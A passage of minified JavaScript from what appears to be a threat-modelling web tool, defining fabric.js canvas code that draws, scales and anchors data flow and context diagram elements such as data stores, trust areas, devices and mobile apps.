r=this.getCanvasElementByID(n.ID);n.Name=(null===(e=this.dataService.Project.FindDeviceOfDiagram(this.Diagram))||void 0===e?void 0:e.Name)+"'s Casing",r.set("scaleX",(a.clientWidth-200)/r.width),r.set("scaleY",(a.clientHeight-100)/r.height),this.fireScaling(r),setTimeout(()=>{this.SendToBack(),this.SelectedElement=null},100)}return this.dataService.Project.DFDElementsChanged.subscribe(i=>{i.Type==Ja.Removed&&this.deleteElement(i.ID)}),!0}instantiateFlow(){return lc.Instantiate(rs.GetDefaultType(this.dataService.Config),this.dataService.Project,this.dataService.Config)}createElement(a,e,i){let n,r;if(a.stencilRef.stencilID)n=this.dataService.Config.GetStencilType(a.stencilRef.stencilID),r=lc.Instantiate(n,this.dataService.Project,this.dataService.Config),n.Name!=a.stencilRef.name&&(r.Name=Gi.FindUniqueName(a.stencilRef.name,this.getViewBaseElements().map(k=>k.Name)));else if(a.stencilRef.elementID)n=this.dataService.Project.GetDFDElement(a.stencilRef.elementID).GetProperty("Type"),r=td.InstantiateRef(this.dataService.Project.GetDFDElement(a.stencilRef.elementID),this.dataService.Project,this.dataService.Config);else if(a.stencilRef.templateID){let k=this.dataService.Config.GetStencilTypeTemplate(a.stencilRef.templateID);for(let q=0;q<k.StencilTypes.length;q++){let Y=k.Layout[q].name;if(Y||(Y=k.StencilTypes[q].Name),r=this.createElement({stencilRef:{name:Y,stencilID:k.StencilTypes[q].ID}},e+k.Layout[q].x,i+k.Layout[q].y),k.StencilTypes[q].ElementTypeID==Et.PhyTrustArea||k.StencilTypes[q].ElementTypeID==Et.LogTrustArea){r.Name=Gi.FindUniqueName(a.stencilRef.name,this.dataService.Project.GetDFDElements().filter(pe=>pe!=r).map(pe=>pe.Name));let te=this.getCanvasElementByID(r.ID);te.set("scaleX",k.Layout[q].width/te.width),te.set("scaleY",k.Layout[q].height/te.height),this.fireScaling(te)}}return r}r.NameChanged.subscribe(k=>this.changeObjectName(r.ID)),r.OutOfScopeChanged.subscribe(k=>this.changeObjectBorder(r.ID)),r.TypeChanged.subscribe(k=>this.changeObjectType(r.ID,k.Name)),r.PhysicalElementChanged.subscribe(k=>this.changeObjectPhysicalElement(r.ID,k));let T=null;if(n.ElementTypeID==Et.PhyProcessing||n.ElementTypeID==Et.LogProcessing?T=this.createProcessing(e-0,i-0,r):n.ElementTypeID==Et.PhyDataStore||n.ElementTypeID==Et.LogDataStore?T=this.createDataStore(e-0,i-0,r):n.ElementTypeID==Et.PhyExternalEntity||n.ElementTypeID==Et.LogExternalEntity?T=this.createExternalEntity(e-0,i-0,r):n.ElementTypeID==Et.DataFlow?T=this.createFlow(e-0,i-0,e-0+200,i-0,r):n.ElementTypeID==Et.PhyTrustArea||n.ElementTypeID==Et.LogTrustArea?T=this.createTrustArea(e-0,i-0,r):n.ElementTypeID==Et.PhysicalLink?T=this.createPhysicalLink(e-0,i-0,r):n.ElementTypeID==Et.Interface&&(T=this.createInterface(e-0,i-0,r)),null!=T)return this.Diagram.Elements.AddChild(r),this.Canvas.add(T),(n.ElementTypeID==Et.PhyTrustArea||n.ElementTypeID==Et.LogTrustArea)&&this.Canvas.sendToBack(T),this.SelectionChanged.emit(r),this.onCanvasModified(),r}getFlowAnchorPoint(a,e){if(e[ot.myType]==wt.Process){if([_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(a)){if(a==_i.NorthEast)return[e.left+e.width-5,e.top+5];if(a==_i.NorthWest)return[e.left+5,e.top+5];if(a==_i.SouthEast)return[e.left+e.width-5,e.top+e.height-5];if(a==_i.SouthWest)return[e.left+5,e.top+e.height-5]}}else if(e[ot.myType]==wt.DataStore){if([_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(a)){if(a==_i.NorthEast)return[e.left+e.width,e.top+7];if(a==_i.NorthWest)return[e.left,e.top+7];if(a==_i.SouthEast)return[e.left+e.width,e.top+e.height-7];if(a==_i.SouthWest)return[e.left,e.top+e.height-7]}}else if(e[ot.myType]==wt.PhysicalLink&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(a)){const i=e.width/7;if(a==_i.NorthWest)return[e.left+i,e.top];if(a==_i.SouthEast)return[e.left+e.width-i,e.top+e.height]}return super.getFlowAnchorPoint(a,e)}subscribeScaling(a){switch(a[ot.myType]){case wt.DataStore:a.on("scaling",e=>this.onScaleDataStore(e));break;case wt.Process:a.on("scaling",e=>this.onScaleProcessing(e));break;case wt.ExternalEntity:a.on("scaling",e=>this.onScaleExternalEntity(e));break;case wt.PhysicalLink:a.on("scaling",e=>this.onScalePhysicalLink(e));break;case wt.Interface:a.on("scaling",e=>this.onScaleInterface(e));break;case wt.TrustArea:a.on("scaling",e=>this.onScaleTrustArea(e));break;default:[wt.Annotation,wt.TextPosPoint,wt.ElementName,wt.DataFlowLine,wt.DataFlowArrowE,wt.DataFlowCircle,wt.DataFlowPoint].includes(a[ot.myType])||console.error("Unknown type: ",a,a[ot.myType])}}getViewBaseElement(a){return this.dataService.Project.GetDFDElement(a)}getViewBaseElements(){return this.dataService.Project.GetDFDElements()}createDataStore(a,e,i){const c=new Ei.fabric.Path(this.createDataStorePath(140,75),{fill:"transparent",stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,myType:wt.ElementBorder}),d=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:2,myType:wt.ElementType}),T=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:70,top:59,myType:wt.ElementPhyElement}),q=[c,d,new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),T,...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(te=>{var pe;return null===(pe=q.find(Re=>Re[ot.fa]==te))||void 0===pe?void 0:pe.set(ot.visible,!1)});const Y=new Ei.fabric.Group(q,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.DataStore});return Y.on("scaling",te=>this.onScaleDataStore(te)),Y.setControlsVisibility({mtr:!1}),Y}createDataStorePath(a,e){return["M 0 8 L 0",(e-9).toString(),"A 10 1.3 0 0 0",a.toString(),(e-9).toString(),"L",a.toString(),"8 A 10 1.3 0 0 0 0 8 A 10 1.3 0 0 0",a.toString(),"8"].join(" ")}onScaleDataStore(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(T=>T[ot.myType]==wt.ElementBorder),n=e._objects.find(T=>T[ot.myType]==wt.ElementType),r=e.width*e.scaleX,c=e.height*e.scaleY;i.set({height:c,width:r,scaleX:1,scaleY:1,left:-r/2,top:-c/2});const d=new Ei.fabric.Path(this.createDataStorePath(r,c));i.set("path",d.path),i.set("pathOffset",{x:r/2,y:c/2}),i.setCoords(),n&&n.set({left:0,top:-c/2+2}),this.onCanvasModified()}createProcessing(a,e,i){const c=new Ei.fabric.Rect({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,rx:15,ry:15,width:140,height:75,fill:"transparent",myType:wt.ElementBorder});let d=null,T=null;i.GetProperties().some(Re=>Re.Type==Ii.DiagramReference)&&(d=new Ei.fabric.Line([15,0,15,75],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth}),T=new Ei.fabric.Line([125,0,125,75],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth}));const k=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:5,myType:wt.ElementType}),q=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:70,top:59,myType:wt.ElementPhyElement}),Y=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),te=[c];d&&te.push(d,T),te.push(k,Y,q,...this.createFlowAnchors(140,75,!0,!0,!1,!0)),4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Re=>{var Fe;return null===(Fe=te.find(Ne=>Ne[ot.fa]==Re))||void 0===Fe?void 0:Fe.set(ot.visible,!1)});const pe=new Ei.fabric.Group(te,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:"P",subTargetCheck:!0});return pe.on("scaling",Re=>this.onScaleProcessing(Re)),pe.setControlsVisibility({mtr:!1}),pe}onScaleProcessing(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),this.onCanvasModified()}createExternalEntity(a,e,i){const c=new Ei.fabric.Rect({stroke:i instanceof td?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:140,height:75,fill:"transparent",myType:wt.ElementBorder}),d=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:5,myType:wt.ElementType}),T=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:70,top:59,myType:wt.ElementPhyElement}),q=[c,d,new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),T,...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(te=>{var pe;return null===(pe=q.find(Re=>Re[ot.fa]==te))||void 0===pe?void 0:pe.set(ot.visible,!1)});const Y=new Ei.fabric.Group(q,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.ExternalEntity});return Y.on("scaling",te=>this.onScaleExternalEntity(te)),Y.setControlsVisibility({mtr:!1}),Y}onScaleExternalEntity(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),this.onCanvasModified()}createPhysicalLink(a,e,i){const k=[new Ei.fabric.Polygon([{x:20,y:0},{x:140,y:0},{x:120,y:75},{x:0,y:75}],{stroke:i instanceof td?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:75,top:5,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:67,top:29.5,textAlign:"center",myType:wt.ElementName}),...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.PhysicalLink});return q.on("scaling",Y=>this.onScalePhysicalLink(Y)),q.setControlsVisibility({mtr:!1}),q}onScalePhysicalLink(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(d=>d[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),i.set("points",[{x:n/7,y:0},{x:n,y:0},{x:n-n/7,y:r},{x:0,y:r}]),i.set("pathOffset",{x:n/2,y:r/2}),this.onCanvasModified()}createInterface(a,e,i){const k=[new Ei.fabric.Polygon([{x:0,y:0},{x:120,y:0},{x:140,y:37.5},{x:120,y:75},{x:0,y:75},{x:20,y:37.5}],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:75,top:5,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:75,top:29.5,textAlign:"center",myType:wt.ElementName}),...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.Interface});return q.on("scaling",Y=>this.onScaleInterface(Y)),q.setControlsVisibility({mtr:!1}),q}onScaleInterface(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(d=>d[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),i.set("points",[{x:0,y:0},{x:n-n/7,y:0},{x:n,y:r/2},{x:n-n/7,y:r},{x:0,y:r},{x:n/7,y:r/2}]),i.set("pathOffset",{x:n/2,y:r/2}),this.onCanvasModified()}createTrustArea(a,e,i,n=350,r=200){const c=new Ei.fabric.Rect({stroke:i instanceof td||i instanceof zm?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:n,height:r,strokeDashArray:[10,5],fill:"transparent",myType:wt.ElementBorder}),d=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"left",originY:"top",left:5,top:20,myType:wt.ElementType}),T=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"left",originY:"top",left:5,top:35,myType:wt.ElementPhyElement}),k=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"left",originY:"top",left:5,top:5,myType:wt.ElementName}),q=new Ei.fabric.Group([c,k,d,T],{left:a,top:e,hasControls:!0,hasBorders:!1,lockRotation:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.TrustArea});return q.on("scaling",Y=>this.onScaleTrustArea(Y)),q.setControlsVisibility({mtr:!1}),q}onScaleTrustArea(a){this.onScaleElement(a);const e=a.transform.target,i=e._objects.find(k=>k[ot.myType]==wt.ElementBorder),n=e._objects.find(k=>k[ot.myType]==wt.ElementType),r=e._objects.find(k=>k[ot.myType]==wt.ElementPhyElement),c=e._objects.find(k=>k[ot.myType]==wt.ElementName),d=e.width*e.scaleX,T=e.height*e.scaleY;i.set({height:T,width:d,scaleX:1,scaleY:1,left:-d/2,top:-T/2}),n.set({left:-d/2+5,top:-T/2+20}),null==r||r.set({left:-d/2+5,top:-T/2+35}),c.set({left:-d/2+5,top:-T/2+5}),this.onCanvasModified()}}class R7 extends D2{constructor(a,e,i,n,r,c,d){super(a,e,i,n,r,c),this.IsContextDiagram=!1,this.IsUseCaseDiagram=!1,this.IsContextDiagram="context"==d,this.IsUseCaseDiagram="use-case"==d}CopyElement(){this.SelectedElement instanceof Ts||this.SelectedElement instanceof Bg||this.SelectedElement instanceof Ou||this.SelectedElement instanceof cf||(this.copyID=this.SelectedElement.ID)}PasteElement(){if(!this.copyID)return;const a=this.getViewBaseElement(this.copyID),e=this.getCanvasElementByID(this.copyID);if(a){const i=this.createElement({contextRef:{name:nM.ToString(a.Type)}},e.left+e.width+10,e.top);i.CopyFrom(a.Data),i.Name+="-Copy";const n=this.getCanvasElementByID(i.ID);n.set("width",e.width),n.set("height",e.height),this.fireScaling(n),this.copyID=null}}initializeCanvas(a){return!!super.initializeCanvas(a)&&(this.IsContextDiagram&&(this.dataService.Project.GetDevices().filter(e=>!(e instanceof Ts)).forEach(e=>{if(!this.getCanvasElementByID(e.ID)){let n=this.createDevice(a.clientWidth/2-100,a.clientHeight/2-100,e,!0);e.NameChanged.subscribe(r=>this.changeObjectName(e.ID)),this.Diagram.Elements.AddChild(e),this.Canvas.add(n),this.onCanvasModified()}e.DeviceInterfaceNameChanged.subscribe(n=>this.changeDeviceInterfaceVisibility(e))}),this.dataService.Project.GetMobileApps().filter(e=>!(e instanceof Ts)).forEach(e=>{if(!this.getCanvasElementByID(e.ID)){let n=this.createMobileApp(a.clientWidth/2-100,a.clientHeight/2-100,e,!0);e.NameChanged.subscribe(r=>this.changeObjectName(e.ID)),this.Diagram.Elements.AddChild(e),this.Canvas.add(n),this.onCanvasModified()}e.MobileAppInterfaceNameChanged.subscribe(n=>this.changeMobileAppInterfaceVisibility(e))})),this.dataService.Project.ContextElementsChanged.subscribe(e=>{e.Type==Ja.Removed&&this.deleteElement(e.ID)}),!0)}instantiateFlow(){return os.Instantiate(Aa.Flow,this.dataService.Project,this.dataService.Config)}getFlowAnchorPoint(a,e){if(e[ot.myType]==wt.DeviceInterface){let i=e._objects.find(n=>n[ot.myType]==wt.ElementBorder);return a==_i.North?[e.left+e.width/2+i.left+i.width/2,e.top+e.height/2+i.top]:a==_i.East?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top+i.height/2]:a==_i.South?[e.left+e.width/2+i.left+i.width/2,e.top+e.height/2+i.top+i.height]:a==_i.West?[e.left+e.width/2+i.left,e.top+e.height/2+i.top+i.height/2]:a==_i.NorthWest?[e.left+e.width/2+i.left,e.top+e.height/2+i.top]:a==_i.NorthEast?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top]:a==_i.SouthEast?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top+i.height]:a==_i.SouthWest?[e.left+e.width/2+i.left,e.top+e.height/2+i.top+i.height]:null}if(e[ot.myType]==wt.Interactor){let i=e._objects.find(r=>r[ot.myType]==wt.InteractorArms);return e._objects.find(r=>r[ot.myType]==wt.InteractorLeg1),a==_i.North?[e.left+e.width/2,e.top+5]:a==_i.East?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top+i.height/2]:a==_i.South?[e.left+e.width/2,e.top+e.height/2+10]:a==_i.West?[e.left+e.width/2+i.left,e.top+e.height/2+i.top+i.height/2]:null}return super.getFlowAnchorPoint(a,e)}createElement(a,e,i){if(!a.contextRef)return null;let n,r=null;if(a.contextRef.elementType==Aa.Device){let c=this.dataService.Project.GetContextElement(a.contextRef.elementID);n=Ts.InstantiateRef(c,this.dataService.Project,this.dataService.Config),r=this.createDevice(e,i,n,!1)}else if("Device"==a.contextRef.name){n=this.dataService.Project.CreateDevice();const c=n;"1"==a.contextRef.type&&(c.InterfaceTop=c.InterfaceRight=c.InterfaceBottom=c.InterfaceLeft=So.None),r=this.createDevice(e,i,n,"2"==a.contextRef.type),this.NavTreeChanged.emit()}else if(a.contextRef.elementType==Aa.MobileApp){let c=this.dataService.Project.GetContextElement(a.contextRef.elementID);n=Ts.InstantiateRef(c,this.dataService.Project,this.dataService.Config),r=this.createMobileApp(e,i,n,!1)}else if("App"==a.contextRef.name){n=this.dataService.Project.CreateMobileApp();const c=n;"1"==a.contextRef.type&&(c.InterfaceTop=c.InterfaceRight=c.InterfaceBottom=c.InterfaceLeft=So.None),r=this.createMobileApp(e,i,n,"2"==a.contextRef.type),this.NavTreeChanged.emit()}else if(a.contextRef.elementType==Aa.Interactor){let c=this.dataService.Project.GetContextElement(a.contextRef.elementID);n=Ts.InstantiateRef(c,this.dataService.Project,this.dataService.Config),r=this.createInteractor(e,i,n)}else"Interactor"==a.contextRef.name?(n=os.Instantiate(Aa.Interactor,this.dataService.Project,this.dataService.Config),r=this.createInteractor(e,i,n)):a.contextRef.name.startsWith("Interface")?(n=os.Instantiate(Aa.Interface,this.dataService.Project,this.dataService.Config),r=this.createInterface(e,i,n,a.contextRef.name)):"Use Case"==a.contextRef.name?(n=os.Instantiate(Aa.UseCase,this.dataService.Project,this.dataService.Config),r=this.createUseCase(e,i,n)):"External Entity"==a.contextRef.name?(n=os.Instantiate(Aa.ExternalEntity,this.dataService.Project,this.dataService.Config),r=this.createExternalEntity(e,i,n)):"Trust Area"==a.contextRef.name&&(n=os.Instantiate(Aa.TrustArea,this.dataService.Project,this.dataService.Config),r=this.createTrustArea(e,i,n));return n.NameChanged.subscribe(c=>this.changeObjectName(n.ID)),n.OutOfScopeChanged.subscribe(c=>this.changeObjectBorder(n.ID)),n.TypeChanged.subscribe(c=>this.changeObjectType(n.ID,nM.ToString(n.Type))),this.Diagram.Elements.AddChild(n),this.Canvas.add(r),"Trust Area"==a.contextRef.name&&this.Canvas.sendToBack(r),this.SelectionChanged.emit(n),this.onCanvasModified(),n}subscribeScaling(a){switch(a[ot.myType]){case wt.Device:case wt.DeviceReference:a.on("scaling",e=>this.onScaleDevice(e));break;case wt.MobileApp:a.on("scaling",e=>this.onScaleMobileApp(e));break;case wt.Interactor:a.on("scaling",e=>this.onScaleInteractor(e));break;case wt.SystemUseCase:a.on("scaling",e=>this.onScaleUseCase(e));break;case wt.DeviceInterface:a.on("scaling",e=>this.onScaleInterface(e));break;case wt.SystemExternalEntity:a.on("scaling",e=>this.onScaleExternalEntity(e));break;case wt.TrustArea:a.on("scaling",e=>this.onScaleTrustArea(e));break;default:[wt.Annotation,wt.TextPosPoint,wt.ElementName,wt.DataFlowLine,wt.DataFlowArrowE,wt.DataFlowCircle,wt.DataFlowPoint].includes(a[ot.myType])||console.error("Unknown type: ",a,a[ot.myType])}}getViewBaseElement(a){return this.Diagram.Elements.GetChildrenFlat().find(e=>e.ID==a)}getViewBaseElements(){return this.Diagram.Elements.GetChildrenFlat()}createDevice(a,e,i,n){let r=200,c=200;this.IsUseCaseDiagram&&(r=250,c=350);const d=i instanceof Ts,Y=[new Ei.fabric.Rect({stroke:d?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:r,height:c,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xabDevice\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:25,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:r/2,top:d?5:c/2-8,textAlign:"center",myType:wt.ElementName})],te=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:20,top:c/2,myType:wt.DeviceLabel1}),pe=new Ei.fabric.Line([20,0,20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel1Line}),Re=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:c-16,myType:wt.DeviceLabel2}),Fe=new Ei.fabric.Line([0,c-20,r,c-20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel2Line}),Ne=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:r,top:c/2,myType:wt.DeviceLabel3}),et=new Ei.fabric.Line([r-20,0,r-20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel3Line}),ut=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:5,myType:wt.DeviceLabel4}),Ze=new Ei.fabric.Line([0,20,r,20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel4Line});let yt=null;i instanceof Ou?yt=i:d&&i.Ref instanceof Ou&&(yt=i.Ref),n&&yt.DeviceInterfaceNameChanged.subscribe(St=>this.changeDeviceInterfaceVisibility(yt)),Y.push(te,pe,Re,Fe,Ne,et,ut,Ze),Y.push(...this.createFlowAnchors(r,c,!0,!0,!0,!0));const It=new Ei.fabric.Group(Y,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:d?wt.DeviceReference:wt.Device,subTargetCheck:!0});return It.on("scaling",St=>this.onScaleDevice(St)),this.changeDeviceInterfaceVisibility(yt,It,!n),It.setControlsVisibility({mtr:!1}),It}onScaleDevice(a){this.onScaleElement(a);const e=a.transform.target,i=e._objects.find(Ne=>Ne[ot.myType]==wt.ElementBorder),n=e._objects.find(Ne=>Ne[ot.myType]==wt.ElementName),r=e._objects.find(Ne=>Ne[ot.myType]==wt.ElementType),c=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel1),d=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel1Line),T=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel2),k=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel2Line),q=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel3),Y=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel3Line),te=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel4),pe=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel4Line);let Re=e.width*e.scaleX,Fe=e.height*e.scaleY;i.set({height:Fe,width:Re,scaleX:1,scaleY:1,left:-Re/2,top:-Fe/2}),e[ot.myType]==wt.DeviceReference&&n.set({left:0,top:-Fe/2+5}),null==r||r.set({left:0,top:-Fe/2+25}),null==c||c.set({left:-Re/2+20,top:0}),null==d||d.set({left:-Re/2+20,top:-Fe/2,height:Fe}),null==T||T.set({left:0,top:Fe/2-16}),null==k||k.set({left:-Re/2,top:Fe/2-20,width:Re}),null==q||q.set({left:Re/2,top:0}),null==Y||Y.set({left:Re/2-20,top:-Fe/2,height:Fe}),null==te||te.set({left:0,top:-Fe/2+5}),null==pe||pe.set({left:-Re/2,top:-Fe/2+20,width:Re}),this.onCanvasModified()}changeDeviceInterfaceVisibility(a,e,i=!1){if(null==e&&(e=this.getCanvasElementByID(a.ID)),e){let n=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel1),r=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel1Line),c=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel2),d=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel2Line),T=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel3),k=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel3Line),q=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel4),Y=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel4Line);n.set("text",this.translate.instant(a.InterfaceLeft)),n.set(ot.visible,a.InterfaceLeft!=So.None&&!i),r.set(ot.visible,a.InterfaceLeft!=So.None&&!i),c.set("text",this.translate.instant(a.InterfaceBottom)),c.set(ot.visible,a.InterfaceBottom!=So.None&&!i),d.set(ot.visible,a.InterfaceBottom!=So.None&&!i),T.set("text",this.translate.instant(a.InterfaceRight)),T.set(ot.visible,a.InterfaceRight!=So.None&&!i),k.set(ot.visible,a.InterfaceRight!=So.None&&!i),null==q||q.set("text",this.translate.instant(a.InterfaceTop)),null==q||q.set(ot.visible,a.InterfaceTop!=So.None&&!i),null==Y||Y.set(ot.visible,a.InterfaceTop!=So.None&&!i),this.Canvas.requestRenderAll()}}createMobileApp(a,e,i,n){let r=200,c=200;this.IsUseCaseDiagram&&(r=250,c=350);let q=[new Ei.fabric.Rect({stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:r,height:c,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xabApp\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:25,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:r/2,top:c/2-8,textAlign:"center",myType:wt.ElementName})],Y=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:20,top:c/2,myType:wt.AppLabel1}),te=new 